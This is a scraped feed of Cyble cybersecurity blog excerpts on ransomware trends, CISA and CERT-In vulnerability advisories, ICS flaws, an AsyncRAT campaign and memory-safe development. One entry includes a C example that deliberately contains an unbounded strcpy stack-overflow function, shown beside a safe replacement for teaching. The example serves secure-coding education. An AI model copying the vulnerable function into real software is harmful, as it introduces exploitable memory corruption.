Published 2025-03-07T08:41:16+00:00 | Source: https://cyble.com/blog/u-s-indictments-shed-light-on-i-soon-tools-methods/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8654481 | Tags: Malware, Tool, Vulnerability, Threat, Patching, Mobile, Cloud

Cyble - CyberSecurity Firm: February Sees Record-Breaking Ransomware Attacks, New Data Shows
Published 2025-03-05T11:54:05+00:00 | Source: https://cyble.com/blog/february-sees-ransomware-attacks-new-data-shows/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8653797 | Tags: Ransomware, Tool, Vulnerability, Threat, Patching, Prediction

Cyble - CyberSecurity Firm: CISA Adds New Critical Vulnerabilities to Known Exploited Vulnerabilities Catalog
Published 2025-03-04T13:07:26+00:00 | Source: https://cyble.com/blog/cisa-adds-new-exploited-vulnerabilities-to-catalog/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8653393 | Tags: Tool, Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: AI, Ransomware, and Cyberterrorism: How UAE is Fighting 200,000 Daily Attacks
Overview
The UAE Cyber Security Council (CSC) has disclosed that the country faces over 200,000 cyberattacks daily, primarily targeting strategic sectors. These cyberterrorist attacks originate from 14 countries, with their perpetrators and attack launch sites identified and countered using advanced global cybersecurity measures. These attacks aim to disrupt critical infrastructure, steal sensitive data, and undermine national security. The CSC has implemented state-of-the-art threat detection and mitigation strategies to safeguard essential services and institutions from these cyber threats.
Strategic Sectors Under Attack
The CSC has reported that cyberterrorist groups primarily focus their attacks on key industries, aiming to disrupt operations and steal sensitive information. Among the affected sectors, the government sector accounted for the highest share at 30%, followed by the financial and banking sector at 7% and the education sector at 7%. Other affected industries, including technology, aviation, and hospitals, each experienced 4% of the attacks, while the remaining 44% were distributed among various other sectors.
Cyberattack Types and Methods
Cyberattacks come in various forms, each posing unique threats to digital infrastructure. The CSC identified several key attack types:
- Attacks on Information Technology and Infrastructure – 40% of total incidents
- File-sharing Attacks – 9%
- Database Vulnerabilities – 3%
…
Published 2025-03-04T09:34:08+00:00 | Source: https://cyble.com/blog/uae-reports-200000-daily-attacks-from-global-terror-groups/ | Feed entry: www.secnews.physaphae.fr/article.php?IdArticle=8653340 | Tags: Ransomware, Malware, Vulnerability, Threat

Cyble - CyberSecurity Firm: Fraud and Ransomware Dominate Malaysia's Q4 2024 Cybersecurity Report
…The Cyber999 incident response centre actively gathers intelligence and collaborates with global entities to improve cybersecurity defences. In Q4 2024, Cyber999 recorded 1,550 incidents, marking a 4% decrease from the 1,623 incidents in Q3 2024.
Breakdown of incidents by month in Q4 2024:
Published 2025-03-03T13:04:23+00:00 | https://cyble.com/blog/fraud-and-ransomware-cybersecurity-report/ | www.secnews.physaphae.fr/article.php?IdArticle=8652974 | Tags: Ransomware, Malware, Vulnerability, Threat, Legislation, Mobile, Prediction

Cyble - CyberSecurity Firm: IT Vulnerability Report: Mac, Windows Fixes Urged by Cyble
Published 2025-03-03T12:17:52+00:00 | https://cyble.com/blog/it-vulnerability-mac-windows-fixes-urged-by-cyble/ | www.secnews.physaphae.fr/article.php?IdArticle=8652975 | Tags: Malware, Tool, Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: CERT-In Warns of Severe Security Vulnerabilities in F5 Solutions
Overview
CERT-In (the Indian Computer Emergency Response Team) has issued a critical security advisory (CIVN-2025-0035) detailing several vulnerabilities affecting various F5 products. If exploited, these vulnerabilities could lead to arbitrary code execution, data theft, system downtime, and denial-of-service (DoS) conditions. The flaws affect a wide range of F5 solutions that enterprises use to optimize application delivery, ensure high performance, and secure critical network services. Because F5 products sit in mission-critical paths, the impact can be severe, jeopardizing the confidentiality, integrity, and availability of affected systems. The advisory highlights multiple classes of issue, including buffer overflows, session hijacking, and improper memory management. Organizations should apply the vendor fixes promptly.
Affected F5 Products
The vulnerabilities disclosed in CIVN-2025-0035 affect several F5 product families, including:
- BIG-IP Next (all modules)
- BIG-IP Next Central Manager
- BIG-IP Next SPK
- BIG-IP Next CNF
- BIG-IP 15.x, 16.x, 17.x
- BIG-IQ Centralized Management 8.x
- F5 Distributed Cloud (all services)
Published 2025-02-28T10:49:00+00:00 | https://cyble.com/blog/cert-security-vulnerabilities-in-f5-solutions/ | www.secnews.physaphae.fr/article.php?IdArticle=8651927 | Tags: Vulnerability, Threat, Patching, Cloud

Cyble - CyberSecurity Firm: U.S. Ransomware Attacks Surged Again in February
Overview
U.S. ransomware incidents in February surged well beyond January's total despite the shorter month. According to Cyble data, U.S. ransomware attacks started 2025 up 150% from the year-ago period, likely driven by the perception among ransomware groups that U.S. organizations are more likely to pay. Canada also continues to experience elevated ransomware activity, while other global regions have remained largely stable (chart below). That trend continued through February: as of February 27, Cyble had recorded 372 ransomware attacks on U.S. organizations, well beyond the 304 attacks for all of January 2025. Globally, ransomware attacks rose from 518 in January to 599 for the first 27 days of February, so the U.S. share of global attacks also increased, from 58.7% to 62.1%.
February ransomware attacks by country (Cyble)
We'll look at what's behind the increase in ransomware attacks (hint: a big name returned in a big way), as well as other developments in the ransomware threat landscape this month.
New Ransomware Groups Emerge
Cyble documented the rise of three new ran
Published 2025-02-28T09:19:29+00:00 | https://cyble.com/blog/u-s-ransomware-attacks-surged-again-in-february/ | www.secnews.physaphae.fr/article.php?IdArticle=8651909 | Tags: Ransomware, Vulnerability, Threat, Patching, Legislation, Prediction, Medical

Cyble - CyberSecurity Firm: New CISA Report Warns of Rising ICS Cybersecurity Risks - Top Vendors Affected
Overview
Cyble's weekly ICS vulnerability intelligence report to clients highlights the latest vulnerability landscape for industrial control systems, derived from alerts by the Cybersecurity and Infrastructure Security Agency (CISA). This report covers vulnerabilities identified between February 19 and February 25, 2025, and sheds light on the ongoing cybersecurity challenges faced by critical industries that rely on ICS technologies. During this period, CISA issued seven security advisories addressing vulnerabilities in ICS products from ABB, Siemens, Rockwell Automation, Rapid Response Monitoring, Elseta, Medixant, and others. ABB was the most affected vendor, with five critical vulnerabilities across its FLXEON Controllers, ASPECT-Enterprise, NEXUS, and MATRIX Series products. Publicly available proof-of-concept (PoC) exploits for the reported vulnerabilities raise the risk of active exploitation, so organizations should address these flaws quickly through patching and mitigation.
ICS Vulnerabilities by Vendor and Product
Figure 1: Vulnerability Severity Category Chart
The ICS vulnerabilities identified during this reporting period span a wide range of critical infrastructure systems.
For instance, ABB reported multiple flaws in its FLXEON Controllers, ASPECT-Enterprise, NEXUS, and MATRIX Series products. These vulnerabilities inc
Published 2025-02-27T11:52:37+00:00 | https://cyble.com/blog/new-cisa-report-rising-ics-cybersecurity-risks/ | www.secnews.physaphae.fr/article.php?IdArticle=8651581 | Tags: Tool, Vulnerability, Patching, Industrial, Medical

Cyble - CyberSecurity Firm: CVE-2024-21966: Critical AMD Ryzen Master Utility Flaw Exposes Systems to Attacks
Published 2025-02-25T12:07:28+00:00 | https://cyble.com/blog/cve-2024-21966-amd-flaw/ | www.secnews.physaphae.fr/article.php?IdArticle=8650855 | Tags: Tool, Vulnerability, Threat

Cyble - CyberSecurity Firm: CVE-2024-21966: Critical AMD Ryzen Master Utility Flaw Exposes Systems to Attacks
Published 2025-02-25T12:07:28+00:00 | https://cyble.com/blog/cve-2024-21966-critical-amd-ryzen-master-utility-flaw-exposes-systems-to-attacks/ | www.secnews.physaphae.fr/article.php?IdArticle=8650836 | Tags: Tool, Vulnerability, Threat

Cyble - CyberSecurity Firm: CISA Adds Two Exploited Vulnerabilities to Catalog: Immediate Action Required for Adobe and Oracle Products
Published 2025-02-25T11:02:24+00:00 | https://cyble.com/blog/cyble-cisa-required-for-adobe-and-oracle-products/ | www.secnews.physaphae.fr/article.php?IdArticle=8650810 | Tags: Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: Major Security Flaw in Juniper Networks Routers: How to Protect Your Systems
Overview
Juniper Networks, a leading provider of networking solutions, has issued a security advisory addressing a critical vulnerability affecting multiple Juniper Networks devices.
This flaw could allow attackers to bypass authentication and gain administrative control over affected systems. Organizations relying on Juniper's Session Smart Routers, Session Smart Conductors, and WAN Assurance Managed Routers should take immediate action to secure their networks.
Impact of the Vulnerability
The vulnerability is classified as an Authentication Bypass Using an Alternate Path or Channel weakness. If exploited, a network-based attacker could bypass the authentication mechanism and obtain administrative privileges on the device. With that access, an attacker could alter network configurations, intercept traffic, and disrupt operations. Juniper Networks has not reported any cases of active exploitation, but given the severity of the issue, organizations should act proactively to mitigate the risk.
Affected Products
The vulnerability affects multiple versions of the following Juniper Networks products:
- Session Smart Router: versions 5.6.7 before 5.6.17, 6.0.8, 6.1 before 6.1.12
Published 2025-02-24T10:57:41+00:00 | https://cyble.com/blog/major-security-flaw-in-juniper-networks-routers/ | www.secnews.physaphae.fr/article.php?IdArticle=8650453 | Tags: Vulnerability, Patching, Cloud

Cyble - CyberSecurity Firm: FBI-CISA Ghost Ransomware Warning Shows Staying Power of Old Vulnerabilities
Published 2025-02-24T08:24:19+00:00 | https://cyble.com/blog/fbi-cisa-shows-staying-power-of-old-vulnerabilities/ | www.secnews.physaphae.fr/article.php?IdArticle=8650418 | Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Patching, Industrial

Cyble - CyberSecurity Firm: OmniGPT Leak Claims Show Risk of Using Sensitive Data on AI Chatbots
Recent claims by threat actors that they obtained an OmniGPT backend database show the risk of entering sensitive data into AI chatbot platforms, where inputs could be revealed to other users or exposed in a breach. OmniGPT has not yet responded to the claims, which were posted by threat actors on the BreachForums leak site, but Cyble's dark web researchers have analyzed the exposed data. Cyble researchers found potentially sensitive and critical data in the files, ranging from personally identifiable information (PII) to financial information, access credentials, tokens, and API keys. The researchers did not attempt to validate the credentials; their analysis is based on the potential severity of the leak if the threat actors' claims prove valid.
OmniGPT Hacker Claims
OmniGPT integrates several well-known large language models (LLMs) into a single platform, including Google Gemini, ChatGPT, Claude Sonnet, Perplexity, DeepSeek, and DALL-E, making it a convenient way to access a range of LLM tools. The threat actors (TAs), who posted under several aliases, claimed that the data "contains all messages between users and the chatbot of this site as well as all links to files uploaded by users and also 30,000 user emails.
You can find a lot of useful information in the messages such as API keys and credentials and many of the fil
Published 2025-02-21T13:59:15+00:00 | https://cyble.com/blog/omnigpt-leak-risk-ai-data/ | www.secnews.physaphae.fr/article.php?IdArticle=8649585 | Tags: Spam, Tool, Vulnerability, Threat | Related: ChatGPT

Cyble - CyberSecurity Firm: Ghost in the Shell: Null-AMSI Evading Traditional Security to Deploy AsyncRAT
Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) identified a campaign that uses malicious LNK files disguised as wallpapers to trick users into executing them.
- The malware uses a multi-stage execution process, with obfuscated PowerShell scripts fetching additional payloads from a remote server.
- The threat actor (TA) behind this campaign leverages the open-source tool Null-AMSI to bypass the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW).
- The PowerShell script used to bypass AMSI and ETW contains comments and error messages in Portuguese, suggesting that the TA may be a Portuguese-speaking individual or group.
- The malware uses AES encryption and GZIP compression to conceal its payloads, making it harder for security tools to analyze and detect the malicious components.
- The final payload is loaded into memory via reflection, bypassing traditional file-based security measures, establishing persistence, and executing AsyncRAT for remote control.
Overview
Cyble Research and Intelligence Labs (CRIL) identified a campaign likely orchestrated by a Portuguese-speaking TA, as evidenced by the comments and error messages in one of the malicious scripts. While the initial infection vector remains unknown, the campaign distributes malware through a deceptive shortcut file: a malicious LNK file disguised as a wallpaper featuring popular animated characters, indicating that the TA is exploiting users' interests to increase the likelihood of infection.
When executed, the shortcut file initiates a series of mali
Published 2025-02-21T05:30:52+00:00 | https://cyble.com/blog/null-amsi-evading-security-to-deploy-asyncrat/ | www.secnews.physaphae.fr/article.php?IdArticle=8649470 | Tags: Spam, Malware, Tool, Vulnerability, Threat, Patching

Cyble - CyberSecurity Firm: Russia-Linked Actors Exploiting Signal Messenger's "Linked Devices" Feature for Espionage in Ukraine
Overview
Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia's intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists.
The tactics observed include phishing attacks abusing Signal's linked devices feature, malicious JavaScript payloads, and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques.
Google has partnered with Signal on security enhancements that mitigate these attack vectors and urges users to update to the latest versions of the app.
Tactics Used to Compromise Signal Accounts
Exploiting Signal's "Linked Devices" Feature
Russia-aligned threat actors have abused Signal's legitimate linked-devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers link an actor-controlled device to the victim's account, enabling real-time message interception without compromising the victim's device itself.
The phishing methods used to deliver these malicious QR codes include:
- Fake Signal group invites containing altered JavaScript redirects.
- Phishing pages masquerading as Ukrainian military applications.
Published 2025-02-20T13:21:16+00:00 | https://cyble.com/blog/germany-strengthening-cybersecurity-2/ | www.secnews.physaphae.fr/article.php?IdArticle=8649243 | Tags: Malware, Tool, Vulnerability, Threat, Mobile, Cloud, Conference | Related: APT 44

Cyble - CyberSecurity Firm: CISA Vulnerability Advisories Reveal Complexity of ICS Products
Overview
Cyble's weekly industrial control system (ICS) vulnerability report to clients examined 122 ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities drawn from 22 recent advisories from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The 122 vulnerabilities affect products from seven vendors across nine critical sectors, ranging from energy and healthcare to wastewater systems, transportation, manufacturing, food and agriculture, chemicals, and commercial facilities. Nine of the vulnerabilities are rated critical. One notable aspect of the advisories is how many of the ICS vulnerabilities originate in third-party components not made by the ICS vendor, which illustrates both the complexity and the exposure of these systems.
Four Critical Siemens Vulnerabilities
Siemens had the highest number of vulnerabilities in the CISA advisories, 100 in all, but only four were rated critical, and all four stem from non-Siemens components. Two of the critical vulnerabilities affect Siemens Opcenter Intelligence, a manufacturing intelligence platform used to improve manufacturing processes, and stem from flaws in the Apache ActiveMQ Java OpenWire protocol marshaller (CVE-2023-46604, a 9.6-severity Deserialization of Untrusted Data vulnerability) and the Tableau Server Administration Agent's internal file transfer service (CVE-2022-22128, a 9.0-rated Path Traversal vulnerability). Opcenter Intelligence versions prior to V2501 are affected.
CISA addressed those vulnerabilities in a February 13 advisory, noting that "Successful exploitation of these vulnerabilities could enable an attacker to execute remote code or allow a malicious site administrator to
Published 2025-02-20T10:10:49+00:00 | https://cyble.com/blog/cisa-vulnerability-complexity-of-ics-products/ | www.secnews.physaphae.fr/article.php?IdArticle=8649191 | Tags: Tool, Vulnerability, Patching, Industrial, Medical, Commercial

Cyble - CyberSecurity Firm: CISA Updates Industrial Control Systems Advisories and Adds New Vulnerabilities to Catalog
Overview
The Cybersecurity and Infrastructure Security Agency (CISA) has announced updates to its Industrial Control Systems (ICS) advisories, along with the addition of two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. On February 18, 2025, CISA published two updated advisories detailing critical vulnerabilities in industrial control systems. These advisories matter to administrators and users of ICS who need to address the security concerns and take the necessary mitigating actions.
ICSA-24-191-01: Delta Electronics CNCSoft-G2 (Update A)
Delta Electronics' CNCSoft-G2, a human-machine interface (HMI) software package, has multiple vulnerabilities that could be exploited by remote attackers. These vulnerabilities, which include buffer overflows and out-of-bounds writes, can lead to remote code execution. Affected versions include CNCSoft-G2 version 2.0.0.5 as well as versions 2.1.0.10 and 2.1.0.16.
The vulnerabilities are as follows:
- Stack-based Buffer Overflow (CVE-2024-39880)
- Out-of-bounds Write (CVE-2024-39881)
- Out-of-bounds Read (CVE-2024-39882)
- Heap-based Buffer Overflow (CVE-2024-39883, CVE-2025-22880, CVE-2024-12858)
Published 2025-02-19T12:18:54+00:00 | https://cyble.com/blog/cisa-upgrades-known-exploited-vulnerabilities-catalog/ | www.secnews.physaphae.fr/article.php?IdArticle=8648991 | Tags: Tool, Vulnerability, Threat, Industrial

Cyble - CyberSecurity Firm: How Modern Defensible Architecture Can Strengthen Australian Cybersecurity Practices
Overview
Cyberattacks in 2025 are not just frequent; they are becoming more technically advanced, which makes a proactive approach to security essential. Organizations should plan for when, not if, an incident will occur. By building a strong security foundation through sound design and strategic planning, Australian businesses can reduce risk and limit the damage from cyberattacks.
A cornerstone of this proactive approach is Modern Defensible Architecture (MDA), a strategic framework for applying security principles consistently in the design, development, and maintenance of systems. The Australian government introduced MDA with guidance from the Australian Signals Directorate (ASD) and the Australian Cyber Security Centre (ACSC). Together, these entities define the Foundations for Modern Defensible Architecture, which help organizations build secure and resilient systems prepared to defend against cyber threats.
Understanding Modern Defensible Architecture
The key to a Modern Defensible Architecture is the ability to defend against current cyber threats while remaining adaptable to future ones.
The ASD, through the ACSC, has developed a set of guidelines known as the
Published 2025-02-19T10:39:07+00:00 | https://cyble.com/blog/australia-introduces-modern-defensible-architecture/ | www.secnews.physaphae.fr/article.php?IdArticle=8648974 | Tags: Vulnerability, Threat, Patching, Cloud

Cyble - CyberSecurity Firm: CERT-In Issues Critical Warning on Adobe Software Security Flaws
Overview
The Indian Computer Emergency Response Team (CERT-In) has issued a critical security advisory (CIVN-2025-0025) detailing multiple vulnerabilities across various Adobe products. These flaws pose significant risks, including arbitrary code execution, privilege escalation, security feature bypass, and denial-of-service (DoS) attacks. Users and administrators of the affected Adobe software are urged to apply the security updates immediately.
Affected Software
The vulnerabilities affect multiple Adobe products and versions:
- Adobe InDesign: ID20.0 and earlier; ID19.5.1 and earlier
- Adobe Commerce: 2.4.4-p11 and earlier; Adobe Commerce B2B 1.3.3-p11 and earlier; Magento Open Source 2.4.4-p11 and earlier
- Adobe Substance 3D Stager: 3.1.0 and earlier
- Adobe InCopy: 20.0 and earlier
Published 2025-02-18T14:09:54+00:00 | https://cyble.com/blog/cert-in-issues-critical-software-security-flaws/ | www.secnews.physaphae.fr/article.php?IdArticle=8648875 | Tags: Vulnerability, Threat

Cyble - CyberSecurity Firm: CVE-2022-31631: High-Risk PHP Vulnerability Demands Immediate Patch
Overview
A critical security vulnerability has been identified in PHP, one of the most widely used server-side scripting languages for web development.
The vulnerability, tracked as CVE-2022-31631, affects multiple versions of PHP and poses a significant risk to websites and applications that rely on the PHP Data Objects (PDO) extension for SQLite database access. The flaw stems from an integer overflow in the PDO::quote() function: an overly long input string can cause the SQLite driver to quote the data incorrectly, so the returned value is not properly escaped. That opens the door to SQL injection and, from there, to unauthorized access, data breaches, and system compromise.
Key Details
CVE ID: CVE-2022-31631
CVSS Base Score: 9.1 (Critical)
Affected Component: PDO::quote() when used with SQLite databases
Impact: SQL injection due to improper string sanitization
Published Date: February 12, 2025
Last Modified: February 13, 2025
Source: PHP Group
Severity Level: Critical
Affected PHP Versions
The vulnerability affects the following versions of PHP:
Published 2025-02-18T13:09:49+00:00 | https://cyble.com/blog/cve-2022-31631-vulnerability-immediate-patch/ | www.secnews.physaphae.fr/article.php?IdArticle=8648866 | Tags: Vulnerability

Cyble - CyberSecurity Firm: CVE-2025-21415 & CVE-2025-21396: Microsoft Addresses Critical Security Risks
Cloud-based platforms and AI-driven services remain in the crosshairs of attackers. Microsoft has released a security advisory addressing two critical vulnerabilities affecting Azure AI Face Service (CVE-2025-21415) and Microsoft Account (CVE-2025-21396). These flaws could allow attackers to escalate privileges under specific conditions, leading to unauthorized access and system compromise. Given the growing reliance on AI and cloud services, understanding these vulnerabilities and their implications matters for organizations and security professionals.
Overview of the Vulnerabilities
Microsoft identified and patched two vulnerabilities that could lead to privilege escalation:
1. CVE-2025-21396 (Microsoft Account Elevation of Privilege Vulnerability)
Severity Score: 7.5 (CVSS)
Cause: Missing authorization checks in Microsoft Accounts.
Risk: An unauthorized attacker could exploit this flaw to elevate privileges over a network.
Discovery: Reported by security researcher Sugobet.
2. CVE-2025-21415 (Azure AI Face Service Elevation of Privilege Vulnerability)
Severity Score: 9.9 (CVSS)
Published 2025-02-17T14:35:56+00:00 | https://cyble.com/blog/cve-2025-21415-microsoft-critical-security-risks/ | www.secnews.physaphae.fr/article.php?IdArticle=8648770 | Tags: Malware, Tool, Vulnerability, Threat, Cloud

Cyble - CyberSecurity Firm: IT Vulnerability Report: Ivanti, Apple Fixes Urged by Cyble
Overview
Cyble's vulnerability intelligence report to clients last week highlighted flaws in Ivanti, Apple, Fortinet, and SonicWall products. The report from Cyble Research and Intelligence Labs (CRIL) examined 22 vulnerabilities and dark web exploits, including some with significant internet-facing exposure. Microsoft had a relatively quiet Patch Tuesday, with the most noteworthy fixes being two actively exploited zero-day vulnerabilities (CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, a Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability), but other IT vendors also issued updates on the second Tuesday of the month. Both Microsoft vulnerabilities were added to CISA's Known Exploited Vulnerabilities catalog. Cyble's vulnerability intelligence unit highlighted five new vulnerabilities as meriting high-priority attention from security teams, plus a month-old vulnerability at elevated risk of attack.
The Top IT Vulnerabilities
Three of the vulnerabilities highlighted by Cyble (CVE-2025-22467, CVE-2024-38657, and CVE-2024-10644) affect Ivanti Connect Secure (ICS), a secure
Published 2025-02-17T11:56:58+00:00 | https://cyble.com/blog/it-vulnerability-ivanti-apple-fixes-urged-by-cyble/ | www.secnews.physaphae.fr/article.php?IdArticle=8648746 | Tags: Vulnerability, Threat, Patching, Industrial

Cyble - CyberSecurity Firm: Germany is Strengthening Cybersecurity with Federal-State Collaboration and Digital Violence Prevention
BSI Expands Cybersecurity Cooperation with Hamburg
Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7 at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees.
BSI Vice President Dr. Gerhard Schabhüser stressed the urgency of strengthening cybersecurity across federal and state levels:
"In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels."
This partnership is part of a broader federal initiative; BSI had previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland. These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents.
With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany's cybersecurity resilience, ensuring that government agencies, public sector institutions, and critical infrastructure operators have the tools and expertise to prevent, detect, and mitigate cyber threats effectively.
Addressing Digital Violence
Days later, on February 11, BSI hosted "BSI in Dialogue: Cybersecurity and Digital Violence" in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks of digital violence in an increasingly interconnected world.
While cybercriminals typically operate remotely, digital violence introduces a different threat model, in which attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes:
- Unauthorized access to smart home device
Published 2025-02-14T12:07:49+00:00 | https://cyble.com/blog/germany-strengthening-cybersecurity/ | www.secnews.physaphae.fr/article.php?IdArticle=8648472 | Tags: Tool, Vulnerability, Threat, Technical

Cyble - CyberSecurity Firm: FBI, CISA Urge Memory-Safe Practices for Software Development
In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to abandon unsafe development practices that lead to "unforgivable" buffer overflow vulnerabilities.
"Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist," the agencies said in the February 12 Secure By Design alert.
“For these reasons-as well as the damage exploitation of these defects can cause-CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.”
The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, which makes them a critical point for preventing attacks.
We'll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and the use of memory-safe programming languages.
Buffer Overflow Vulnerabilities: Prevalence and Examples
The FBI-CISA guidance specifically cites the common software weakness CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with its stack-based (CWE-121) and heap-based (CWE-122) buffer overflow variants.
The phrase "buffer overflow" occurs in 67 of the 1,270 vulnerabilities in CISA's Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words "buffer" and "overflow" both occur in 84 of the KEV vulnerabilities (6.6%).
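As an added illustration of the CWE-121 stack-based overflow pattern the advisory calls unforgivable, the following C program (written for this page; it is not code from CISA, the FBI, or any vendor cited) places the classic unchecked strcpy() beside a bounded replacement. The function and buffer names, the 16-byte field size, and the inputs in main() are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Fixed-size field of the kind protocol parsers and firmware keep on the stack. */
#define NAME_LEN 16

/*
 * CWE-121 pattern, hypothetical: strcpy() into a fixed stack buffer with no
 * length check. A name of NAME_LEN bytes or more writes past 'buf' into
 * whatever the compiler placed after it (saved registers, return address).
 * Kept only for contrast; this file never hands it oversized input.
 */
static void greet_unsafe(const char *name)
{
    char buf[NAME_LEN];
    strcpy(buf, name);                 /* unbounded: the "unforgivable" defect */
    printf("hello, %s\n", buf);
}

/*
 * Hardened replacement. The caller supplies the destination size, the scan
 * of 'src' is bounded by it (so an unterminated source cannot be over-read),
 * truncation is reported instead of silently accepted, and the result is
 * always NUL-terminated. Returns 0 on success, -1 if 'src' does not fit
 * (in which case 'dst' is left as an empty string).
 */
int copy_name_safe(char *dst, size_t dst_len, const char *src)
{
    if (dst == NULL || src == NULL || dst_len == 0)
        return -1;

    size_t n = 0;
    while (n < dst_len && src[n] != '\0')
        n++;
    if (n == dst_len) {                /* n bytes plus the NUL would not fit */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Same greeting as greet_unsafe(), built on the bounded copy. */
int greet_safe(const char *name)
{
    char buf[NAME_LEN];
    if (copy_name_safe(buf, sizeof buf, name) != 0) {
        fprintf(stderr, "rejected: name longer than %d bytes\n", NAME_LEN - 1);
        return -1;
    }
    printf("hello, %s\n", buf);
    return 0;
}

int main(void)
{
    /* Constructed inputs: one that fits, one exactly one byte too long. */
    greet_unsafe("alice");             /* 6 bytes including NUL: fits */
    greet_safe("alice");               /* hello, alice */
    greet_safe("0123456789abcdef");    /* 16 bytes: rejected, no overflow */
    return 0;
}
```

copy_name_safe() takes the destination size from the caller, never reads more than that many bytes of the source, and reports truncation as an error rather than silently accepting it; the same shape works for heap buffers (CWE-122), since the bound comes from the caller rather than from the source string. Build with `cc -Wall -o bufdemo bufdemo.c`; handing greet_safe() a 16-character name exercises the rejection path, whereas the same name would overrun greet_unsafe()'s buffer.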
CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products:
- CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability
- CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3
Published 2025-02-14T10:11:29+00:00 | https://cyble.com/blog/fbi-cisa-push-for-memory-safe-software-practices/ | www.secnews.physaphae.fr/article.php?IdArticle=8648463 | Tags: Vulnerability, Threat

Cyble - CyberSecurity Firm: CISA Updates Known Exploited Vulnerabilities Catalog with Four Critical Issues
In a recent update to its Known Exploited Vulnerabilities (KEV) Catalog, the Cybersecurity and Infrastructure Security Agency (CISA) added four vulnerabilities that are under active exploitation. They span multiple platforms and pose substantial risk to organizations and individual users. CVE-2024-40891, CVE-2024-40890, CVE-2025-21418, and CVE-2025-21391 can be exploited with relative ease where security updates have not been applied. Users and organizations should follow the guidance issued by Zyxel and Microsoft and keep their systems updated. Organizations relying on Zyxel DSL routers or Windows systems should assess their exposure and update firmware or software promptly.
Details of the Vulnerabilities and Active Exploitation

CVE-2024-40891 and CVE-2024-40890: Critical Command Injection Vulnerabilities in Zyxel DSL Routers

The two vulnerabilities, CVE-2024-40891 and CVE-2024-40890, are related to a series of Command Injection Vulnerabilities affecting Zyxel DSL CPE devices. Specifically, these vulnerabilities affect the Zyxel VMG4325-B10A router model running firmware version 1.00(AAFR.4)C0_20170615. Both vulnerabilities share a common thread: they allow authenticated attackers to execute arbitrary operating system (OS) commands on the affected devices via Telnet (CVE-2024-40891) or a crafted HTTP POST request (CVE-2024-40890). This puts devices at high risk of being compromised by threat actors who can exploit these weaknesses to gain control of the affected systems. According to the official Zyxel advisory, both vulnerabilities have been assigned a CVSS severity score of 8.8 (High). These flaws stem from improper neutralization of special elements used in OS commands (CWE-78: Improper Neutralization of Special Elements used in an OS Command). Once successfully exploited, the vulnerabilities could allow attackers to bypass authentication and execute malicious OS commands, effectively compromising the security of the devices. Zyxel has issued advisories urging users to update their firmware to mitigate these vulnerabilities. Devices using older firmware versions are especially at risk.
The active exploitation of these vulnerabilities could lead to severe consequences, such as unauthorized access,

2025-02-13T11:40:21+00:00 https://cyble.com/blog/cisa-adds-4-critical-vulnerabilities/

Cyble - CyberSecurity Firm: Cyble Warns of Exposed Medical Imaging, Asset Management Systems

Overview

Cyble's weekly industrial control system (ICS) vulnerability report to clients warned about internet-facing medical imaging and critical infrastructure asset management systems that could be vulnerable to cyberattacks. The report examined six ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities in total, but it focused on two in particular after Cyble detected web-exposed instances of the systems.

Orthanc, Trimble Cityworks Vulnerabilities Highlighted by CISA

